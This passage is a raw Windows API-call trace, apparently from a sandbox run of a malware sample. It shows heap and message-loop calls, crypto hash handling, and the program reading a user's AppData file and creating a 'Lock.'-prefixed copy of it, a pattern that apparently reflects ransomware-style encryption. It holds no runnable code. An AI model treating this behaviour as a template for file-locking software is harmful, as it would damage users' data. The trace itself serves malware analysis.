(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0226.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0226.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0226.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0226.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0226.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0226.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0226.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0226.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0226.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0226.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0226.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0226.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0226.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0226.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0226.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0226.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0226.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0226.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0226.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0226.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0226.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0226.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0226.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0226.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0226.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0226.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0226.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0226.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0226.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0226.683] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.683] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0226.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0226.683] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0226.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0226.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0226.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0226.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0226.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b48 [0226.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0226.683] CryptDestroyHash (hHash=0xa873d0) returned 1 [0226.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0226.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0226.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0226.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0226.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0226.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0226.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0226.684] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0226.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0226.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0226.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0226.684] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.684] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.684] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.684] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0226.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0226.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0226.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0226.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0226.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0226.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0226.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0226.685] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/CTe6ly.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cte6ly.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0226.686] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.686] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0226.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0226.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0226.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0226.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0226.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0226.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0226.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0226.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0226.686] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0226.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0226.686] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0226.686] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0226.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0226.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0226.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0226.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0226.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0226.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0226.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0226.687] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0226.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0226.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0226.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0226.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0226.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0226.687] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.CTe6ly.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.cte6ly.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0226.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0226.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0226.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0226.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0226.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0226.688] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0226.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0226.688] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0226.688] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0226.688] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0226.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0226.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0226.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0226.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0226.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0226.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0226.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0226.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0226.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0226.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0226.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0226.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0226.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe56020 [0226.692] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0226.692] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x4f91, lpOverlapped=0x0) returned 1 [0226.732] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0226.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0226.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0226.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0226.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4f91) returned 0x3bf0dd8 [0226.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe56020 | out: hHeap=0x970000) returned 1 [0226.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0226.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0226.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0226.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0226.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0226.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0226.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4f91) returned 0x2f14818 [0226.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0226.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.737] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0226.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0226.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0226.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0226.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0226.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4f91) returned 0x3bf0dd8 [0226.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0226.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0226.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0226.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0226.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0226.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0226.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0226.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0226.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0226.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0226.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 